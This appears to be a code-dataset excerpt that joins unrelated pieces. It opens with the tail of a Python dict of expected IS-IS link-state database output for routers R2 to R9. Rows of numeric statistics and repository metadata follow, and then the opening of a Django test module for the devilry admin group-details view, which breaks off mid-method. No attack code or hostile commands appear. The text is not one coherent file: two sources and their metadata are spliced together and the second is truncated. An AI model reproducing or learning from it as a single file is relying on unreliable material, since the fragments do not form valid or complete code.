'up_down': True,
},
},
'extended_is_neighbor': {
'R3.01': {
'metric': 10,
'neighbor_id': 'R3.01',
},
'R5.02': {
'metric': 10,
'neighbor_id': 'R5.02',
},
'R5.03': {
'metric': 10,
'neighbor_id': 'R5.03',
},
},
'ipv4_addresses': ['5.5.5.5'],
'ipv6_addresses': ['2001:db8:5:5:5::5'],
'lsp_id': 'R5.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'16386': {
'attributes': '0',
'mt_id': '16386',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:4::/64': {
'ip_prefix': '2001:db8:10:4::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:5::/64': {
'ip_prefix': '2001:db8:10:5::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:5:5:5::5/128': {
'ip_prefix': '2001:db8:5:5:5::5',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R5.02': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R5.02',
},
},
'remaining_lifetime': 984,
'sequence': '0x0000034D',
},
'R5.02-00': {
'checksum': '0xA5B5',
'extended_is_neighbor': {
'R4.00': {
'metric': 0,
'neighbor_id': 'R4.00',
},
'R5.00': {
'metric': 0,
'neighbor_id': 'R5.00',
},
},
'lsp_id': 'R5.02-00',
'remaining_lifetime': 651,
'sequence': '0x0000034E',
},
'R5.03-00': {
'checksum': '0x9C89',
'extended_is_neighbor': {
'R5.00': {
'metric': 0,
'neighbor_id': 'R5.00',
},
'R7.00': {
'metric': 0,
'neighbor_id': 'R7.00',
},
},
'lsp_id': 'R5.03-00',
'remaining_lifetime': 897,
'sequence': '0x0000034F',
},
'R6.00-00': {
'checksum': '0xA52C',
'dynamic_hostname': 'R6',
'extended_ipv4_reachability': {
'10.3.6.0/24': {
'ip_prefix': '10.3.6.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.6.7.0/24': {
'ip_prefix': '10.6.7.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'6.6.6.0/24': {
'ip_prefix': '6.6.6.0',
'metric': 1,
'prefix_len': '24',
'up_down': True,
},
},
'extended_is_neighbor': {
'R3.05': {
'metric': 40,
'neighbor_id': 'R3.05',
},
'R7.02': {
'metric': 40,
'neighbor_id': 'R7.02',
},
},
'ipv4_addresses': ['6.6.6.6'],
'lsp_id': 'R6.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:6::/64': {
'ip_prefix': '2001:db8:10:6::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:6:6:6::6/128': {
'ip_prefix': '2001:db8:6:6:6::6',
'metric': 1,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R7.00': {
'metric': 40,
'mt_id': '2',
'neighbor_id': 'R7.02',
},
},
'remaining_lifetime': 987,
'sequence': '0x000004B3',
},
'R7.00-00': {
'checksum': '0x425F',
'dynamic_hostname': 'R7',
'extended_ipv4_reachability': {
'10.5.7.0/24': {
'ip_prefix': '10.5.7.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.6.7.0/24': {
'ip_prefix': '10.6.7.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.7.8.0/24': {
'ip_prefix': '10.7.8.0',
'metric': 40,
'prefix_len': '24',
'up_down': False,
},
'10.7.9.0/24': {
'ip_prefix': '10.7.9.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'7.7.7.7/32': {
'ip_prefix': '7.7.7.7',
'metric': 1,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R5.03': {
'metric': 40,
'neighbor_id': 'R5.03',
},
'R7.02': {
'metric': 40,
'neighbor_id': 'R7.02',
},
},
'ipv4_addresses': ['7.7.7.7'],
'lsp_id': 'R7.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:5::/64': {
'ip_prefix': '2001:db8:10:5::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:6::/64': {
'ip_prefix': '2001:db8:10:6::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:77::/64': {
'ip_prefix': '2001:db8:10:77::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:7::/64': {
'ip_prefix': '2001:db8:10:7::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': False,
},
'2001:db8:7:7:7::7/128': {
'ip_prefix': '2001:db8:7:7:7::7',
'metric': 1,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R7.02': {
'metric': 40,
'mt_id': '2',
'neighbor_id': 'R5.03',
},
},
'remaining_lifetime': 787,
'sequence': '0x000004B6',
},
'R7.02-00': {
'checksum': '0x25F2',
'extended_is_neighbor': {
'R6.00': {
'metric': 0,
'neighbor_id': 'R6.00',
},
'R7.00': {
'metric': 0,
'neighbor_id': 'R7.00',
},
},
'lsp_id': 'R7.02-00',
'remaining_lifetime': 697,
'sequence': '0x000004B2',
},
},
2: {
'R2.00-00': {
'checksum': '0x4E40',
'dynamic_hostname': 'R2',
'extended_ipv4_reachability': {
'1.1.1.1/32': {
'ip_prefix': '1.1.1.1',
'metric': 20,
'prefix_len': '32',
'up_down': True,
},
'10.1.2.0/24': {
'ip_prefix': '10.1.2.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.2.3.0/24': {
'ip_prefix': '10.2.3.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'2.2.2.2/32': {
'ip_prefix': '2.2.2.2',
'metric': 10,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R3.07': {
'metric': 10,
'neighbor_id': 'R3.07',
},
},
'ipv4_addresses': ['2.2.2.2'],
'ipv6_addresses': ['2001:db8:2:2:2::2'],
'lsp_id': 'R2.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:1::/64': {
'ip_prefix': '2001:db8:10:1::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:2::/64': {
'ip_prefix': '2001:db8:10:2::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:1:1:1::1/128': {
'ip_prefix': '2001:db8:1:1:1::1',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:2:2:2::2/128': {
'ip_prefix': '2001:db8:2:2:2::2',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R3.07': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R3.07',
},
},
'remaining_lifetime': 870,
'sequence': '0x00000351',
},
'R3.00-00': {
'checksum': '0xC91D',
'dynamic_hostname': 'R3',
'extended_ipv4_reachability': {
'10.2.3.0/24': {
'ip_prefix': '10.2.3.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.4.0/24': {
'ip_prefix': '10.3.4.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.5.0/24': {
'ip_prefix': '10.3.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.6.0/24': {
'ip_prefix': '10.3.6.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.4.5.0/24': {
'ip_prefix': '10.4.5.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'10.5.7.0/24': {
'ip_prefix': '10.5.7.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'10.6.7.0/24': {
'ip_prefix': '10.6.7.0',
'metric': 50,
'prefix_len': '24',
'up_down': True,
},
'10.7.9.0/24': {
'ip_prefix': '10.7.9.0',
'metric': 60,
'prefix_len': '24',
'up_down': True,
},
'3.3.3.0/24': {
'ip_prefix': '3.3.3.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'4.4.4.4/32': {
'ip_prefix': '4.4.4.4',
'metric': 20,
'prefix_len': '32',
'up_down': True,
},
'5.5.5.5/32': {
'ip_prefix': '5.5.5.5',
'metric': 20,
'prefix_len': '32',
'up_down': True,
},
'6.6.6.0/24': {
'ip_prefix': '6.6.6.0',
'metric': 11,
'prefix_len': '24',
'up_down': True,
},
'7.7.7.7/32': {
'ip_prefix': '7.7.7.7',
'metric': 21,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R3.01': {
'metric': 10,
'neighbor_id': 'R3.01',
},
'R3.07': {
'metric': 10,
'neighbor_id': 'R3.07',
},
},
'ipv4_addresses': ['3.3.3.3'],
'ipv6_addresses': ['2001:db8:3:3:3::3'],
'lsp_id': 'R3.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:2::/64': {
'ip_prefix': '2001:db8:10:2::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:4::/64': {
'ip_prefix': '2001:db8:10:4::',
'metric': 20,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:5::/64': {
'ip_prefix': '2001:db8:10:5::',
'metric': 20,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:6::/64': {
'ip_prefix': '2001:db8:10:6::',
'metric': 50,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:77::/64': {
'ip_prefix': '2001:db8:10:77::',
'metric': 60,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:3:3:3::3/128': {
'ip_prefix': '2001:db8:3:3:3::3',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:4:4:4::4/128': {
'ip_prefix': '2001:db8:4:4:4::4',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:5:5:5::5/128': {
'ip_prefix': '2001:db8:5:5:5::5',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:6:6:6::6/128': {
'ip_prefix': '2001:db8:6:6:6::6',
'metric': 11,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:7:7:7::7/128': {
'ip_prefix': '2001:db8:7:7:7::7',
'metric': 21,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R3.07': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R3.07',
},
},
'remaining_lifetime': 618,
'sequence': '0x00000359',
},
'R3.01-00': {
'checksum': '0xF521',
'extended_is_neighbor': {
'R3.00': {
'metric': 0,
'neighbor_id': 'R3.00',
},
'R5.00': {
'metric': 0,
'neighbor_id': 'R5.00',
},
},
'lsp_id': 'R3.01-00',
'remaining_lifetime': 712,
'sequence': '0x0000034F',
},
'R3.07-00': {
'checksum': '0xC77A',
'extended_is_neighbor': {
'R2.00': {
'metric': 0,
'neighbor_id': 'R2.00',
},
'R3.00': {
'metric': 0,
'neighbor_id': 'R3.00',
},
},
'lsp_id': 'R3.07-00',
'remaining_lifetime': 1086,
'sequence': '0x00000351',
},
'R5.00-00': {
'checksum': '0xC9D4',
'dynamic_hostname': 'R5',
'extended_ipv4_reachability': {
'10.2.3.0/24': {
'ip_prefix': '10.2.3.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'10.3.4.0/24': {
'ip_prefix': '10.3.4.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'10.3.5.0/24': {
'ip_prefix': '10.3.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.6.0/24': {
'ip_prefix': '10.3.6.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'10.4.5.0/24': {
'ip_prefix': '10.4.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.5.7.0/24': {
'ip_prefix': '10.5.7.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.6.7.0/24': {
'ip_prefix': '10.6.7.0',
'metric': 50,
'prefix_len': '24',
'up_down': True,
},
'10.7.9.0/24': {
'ip_prefix': '10.7.9.0',
'metric': 50,
'prefix_len': '24',
'up_down': True,
},
'3.3.3.0/24': {
'ip_prefix': '3.3.3.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'4.4.4.4/32': {
'ip_prefix': '4.4.4.4',
'metric': 20,
'prefix_len': '32',
'up_down': True,
},
'5.5.5.5/32': {
'ip_prefix': '5.5.5.5',
'metric': 10,
'prefix_len': '32',
'up_down': True,
},
'6.6.6.0/24': {
'ip_prefix': '6.6.6.0',
'metric': 21,
'prefix_len': '24',
'up_down': True,
},
'7.7.7.7/32': {
'ip_prefix': '7.7.7.7',
'metric': 11,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R3.01': {
'metric': 10,
'neighbor_id': 'R3.01',
},
'R5.03': {
'metric': 10,
'neighbor_id': 'R5.03',
},
},
'ipv4_addresses': ['5.5.5.5'],
'ipv6_addresses': ['2001:db8:5:5:5::5'],
'lsp_id': 'R5.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:2::/64': {
'ip_prefix': '2001:db8:10:2::',
'metric': 20,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:4::/64': {
'ip_prefix': '2001:db8:10:4::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:5::/64': {
'ip_prefix': '2001:db8:10:5::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:6::/64': {
'ip_prefix': '2001:db8:10:6::',
'metric': 50,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:77::/64': {
'ip_prefix': '2001:db8:10:77::',
'metric': 50,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:3:3:3::3/128': {
'ip_prefix': '2001:db8:3:3:3::3',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:4:4:4::4/128': {
'ip_prefix': '2001:db8:4:4:4::4',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:5:5:5::5/128': {
'ip_prefix': '2001:db8:5:5:5::5',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:6:6:6::6/128': {
'ip_prefix': '2001:db8:6:6:6::6',
'metric': 21,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:7:7:7::7/128': {
'ip_prefix': '2001:db8:7:7:7::7',
'metric': 11,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R3.01': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R3.01',
},
},
'remaining_lifetime': 606,
'sequence': '0x00000353',
},
'R5.03-00': {
'checksum': '0xB6F8',
'extended_is_neighbor': {
'R5.00': {
'metric': 0,
'neighbor_id': 'R5.00',
},
'R7.00': {
'metric': 0,
'neighbor_id': 'R7.00',
},
},
'lsp_id': 'R5.03-00',
'remaining_lifetime': 642,
'sequence': '0x0000034E',
},
'R7.00-00': {
'checksum': '0x59EB',
'dynamic_hostname': 'R7',
'extended_ipv4_reachability': {
'10.5.7.0/24': {
'ip_prefix': '10.5.7.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.6.7.0/24': {
'ip_prefix': '10.6.7.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.7.8.0/24': {
'ip_prefix': '10.7.8.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.7.9.0/24': {
'ip_prefix': '10.7.9.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'7.7.7.7/32': {
'ip_prefix': '7.7.7.7',
'metric': 1,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R5.03': {
'metric': 40,
'neighbor_id': 'R5.03',
},
'R8.01': {
'metric': 40,
'neighbor_id': 'R8.01',
},
'R9.01': {
'metric': 40,
'neighbor_id': 'R9.01',
},
},
'ipv4_addresses': ['7.7.7.7'],
'lsp_id': 'R7.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:5::/64': {
'ip_prefix': '2001:db8:10:5::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:6::/64': {
'ip_prefix': '2001:db8:10:6::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:77::/64': {
'ip_prefix': '2001:db8:10:77::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:7::/64': {
'ip_prefix': '2001:db8:10:7::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:7:7:7::7/128': {
'ip_prefix': '2001:db8:7:7:7::7',
'metric': 1,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R7.00': {
'metric': 40,
'mt_id': '2',
'neighbor_id': 'R8.01',
},
},
'remaining_lifetime': 926,
'sequence': '0x000004B5',
},
'R8.00-00': {
'checksum': '0x7758',
'dynamic_hostname': 'R8',
'extended_ipv4_reachability': {
'10.7.8.0/24': {
'ip_prefix': '10.7.8.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'8.8.8.8/32': {
'ip_prefix': '8.8.8.8',
'metric': 10,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R8.01': {
'metric': 10,
'neighbor_id': 'R8.01',
},
},
'ipv4_addresses': ['8.8.8.8'],
'ipv6_addresses': ['2001:db8:8:8:8::8'],
'lsp_id': 'R8.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:7::/64': {
'ip_prefix': '2001:db8:10:7::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:8:8:8::8/128': {
'ip_prefix': '2001:db8:8:8:8::8',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R8.01': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R8.01',
},
},
'remaining_lifetime': 1116,
'sequence': '0x0000034E',
},
'R8.01-00': {
'checksum': '0xF753',
'extended_is_neighbor': {
'R7.00': {
'metric': 0,
'neighbor_id': 'R7.00',
},
'R8.00': {
'metric': 0,
'neighbor_id': 'R8.00',
},
},
'lsp_id': 'R8.01-00',
'remaining_lifetime': 770,
'sequence': '0x0000034E',
},
'R9.00-00': {
'checksum': '0x6C98',
'dynamic_hostname': 'R9',
'extended_ipv4_reachability': {
'10.10.10.10/32': {
'ip_prefix': '10.10.10.10',
'metric': 20,
'prefix_len': '32',
'up_down': True,
},
'10.7.9.0/24': {
'ip_prefix': '10.7.9.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.9.10.0/24': {
'ip_prefix': '10.9.10.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'9.9.9.9/32': {
'ip_prefix': '9.9.9.9',
'metric': 10,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R9.01': {
'metric': 10,
'neighbor_id': 'R9.01',
},
},
'ipv4_addresses': ['9.9.9.9'],
'ipv6_addresses': ['2001:db8:9:9:9::9'],
'lsp_id': 'R9.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:10:10::10/128': {
'ip_prefix': '2001:db8:10:10:10::10',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:10:7::/64': {
'ip_prefix': '2001:db8:10:7::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:9::/64': {
'ip_prefix': '2001:db8:10:9::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:9:9:9::9/128': {
'ip_prefix': '2001:db8:9:9:9::9',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R9.01': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R9.01',
},
},
'remaining_lifetime': 871,
'sequence': '0x0000034A',
},
'R9.01-00': {
'checksum': '0x5624',
'extended_is_neighbor': {
'R7.00': {
'metric': 0,
'neighbor_id': 'R7.00',
},
'R9.00': {
'metric': 0,
'neighbor_id': 'R9.00',
},
},
'lsp_id': 'R9.01-00',
'remaining_lifetime': 718,
'sequence': '0x00000352',
},
},
},
},
},
},
},
}
| 52.923305
| 81
| 0.228374
| 9,533
| 142,840
| 3.338928
| 0.037239
| 0.042884
| 0.035815
| 0.053723
| 0.881904
| 0.849325
| 0.820515
| 0.796858
| 0.752655
| 0.732799
| 0
| 0.188085
| 0.687896
| 142,840
| 2,698
| 82
| 52.942921
| 0.525897
| 0.00028
| 0
| 0.669409
| 0
| 0.010471
| 0.39319
| 0.012809
| 0
| 0
| 0.007578
| 0
| 0
| 1
| 0
| false
| 0.000748
| 0
| 0
| 0.002992
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3c5327dac24757c452449d74b0c8770d76b59b39
| 14,298
|
py
|
Python
|
devilry/devilry_admin/tests/assignment/students/test_groupdetails.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
devilry/devilry_admin/tests/assignment/students/test_groupdetails.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
devilry/devilry_admin/tests/assignment/students/test_groupdetails.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
from datetime import timedelta
import htmls
import mock
from django import test
from django.http import Http404
from django.utils import timezone
from django_cradmin import cradmin_testhelpers
from model_mommy import mommy
from devilry.apps.core import devilry_core_mommy_factories
from devilry.apps.core.models import Assignment, AssignmentGroup
from devilry.devilry_admin.views.assignment.students import groupdetails
from devilry.devilry_group import devilry_group_mommy_factories
from devilry.devilry_dbcache.customsql import AssignmentGroupDbCacheCustomSql
class TestGroupDetailsRenderable(test.TestCase):
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_name(self):
testgroup = mommy.make('core.AssignmentGroup')
mommy.make('core.Candidate',
assignment_group=testgroup,
relatedstudent__user__fullname='Test User',
relatedstudent__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.django-cradmin-listbuilder-itemvalue-titledescription-title').alltext_normalized)
def test_name_semi_anonymous_is_not_anonymized(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
mommy.make('core.Candidate',
assignment_group=testgroup,
relatedstudent__user__fullname='Test User',
relatedstudent__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.django-cradmin-listbuilder-itemvalue-titledescription-title').alltext_normalized)
def test_name_fully_anonymous_is_not_anonymized(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
mommy.make('core.Candidate',
assignment_group=testgroup,
relatedstudent__user__fullname='Test User',
relatedstudent__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.django-cradmin-listbuilder-itemvalue-titledescription-title').alltext_normalized)
def test_examiners(self):
testgroup = mommy.make('core.AssignmentGroup')
mommy.make('core.Examiner',
assignmentgroup=testgroup,
relatedexaminer__user__fullname='Test User',
relatedexaminer__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.devilry-cradmin-groupitemvalue-examiners-names').alltext_normalized)
def test_examiners_semi_anonymous(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
mommy.make('core.Examiner',
assignmentgroup=testgroup,
relatedexaminer__user__fullname='Test User',
relatedexaminer__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.devilry-cradmin-groupitemvalue-examiners-names').alltext_normalized)
def test_examiners_fully_anonymous(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
mommy.make('core.Examiner',
assignmentgroup=testgroup,
relatedexaminer__user__fullname='Test User',
relatedexaminer__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.devilry-cradmin-groupitemvalue-examiners-names').alltext_normalized)
def test_grade_students_can_see_points_false(self):
devilry_group_mommy_factories.feedbackset_first_attempt_published(
group__parentnode__students_can_see_points=False,
grading_points=1)
testgroup = AssignmentGroup.objects.first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Grade: passed (1/1)',
selector.one('.devilry-cradmin-groupitemvalue-grade').alltext_normalized)
def test_grade_students_can_see_points_true(self):
devilry_group_mommy_factories.feedbackset_first_attempt_published(
group__parentnode__students_can_see_points=True,
grading_points=1)
testgroup = AssignmentGroup.objects.first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Grade: passed (1/1)',
selector.one('.devilry-cradmin-groupitemvalue-grade').alltext_normalized)
def test_status_is_corrected(self):
devilry_group_mommy_factories.feedbackset_first_attempt_published(
grading_points=1)
testgroup = AssignmentGroup.objects.annotate_with_is_corrected_count().first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(value=testgroup,
assignment=testgroup.assignment).render())
self.assertFalse(selector.exists('.devilry-cradmin-groupitemvalue-status'))
def test_status_is_waiting_for_feedback(self):
devilry_group_mommy_factories.feedbackset_first_attempt_unpublished(
group__parentnode=mommy.make_recipe('devilry.apps.core.assignment_activeperiod_start'))
testgroup = AssignmentGroup.objects.annotate_with_is_waiting_for_feedback_count().first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(value=testgroup,
assignment=testgroup.assignment).render())
self.assertEqual(
'Status: waiting for feedback',
selector.one('.devilry-cradmin-groupitemvalue-status').alltext_normalized)
self.assertFalse(selector.exists('.devilry-cradmin-groupitemvalue-grade'))
def test_status_is_waiting_for_deliveries(self):
devilry_group_mommy_factories.feedbackset_first_attempt_unpublished(
group__parentnode=mommy.make_recipe('devilry.apps.core.assignment_activeperiod_start',
first_deadline=timezone.now() + timedelta(days=2)))
testgroup = AssignmentGroup.objects.annotate_with_is_waiting_for_deliveries_count().first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(value=testgroup,
assignment=testgroup.assignment).render())
self.assertEqual(
'Status: waiting for deliveries',
selector.one('.devilry-cradmin-groupitemvalue-status').alltext_normalized)
self.assertFalse(selector.exists('.devilry-cradmin-groupitemvalue-grade'))
def test_grade_not_available_unless_corrected(self):
devilry_group_mommy_factories.feedbackset_first_attempt_unpublished()
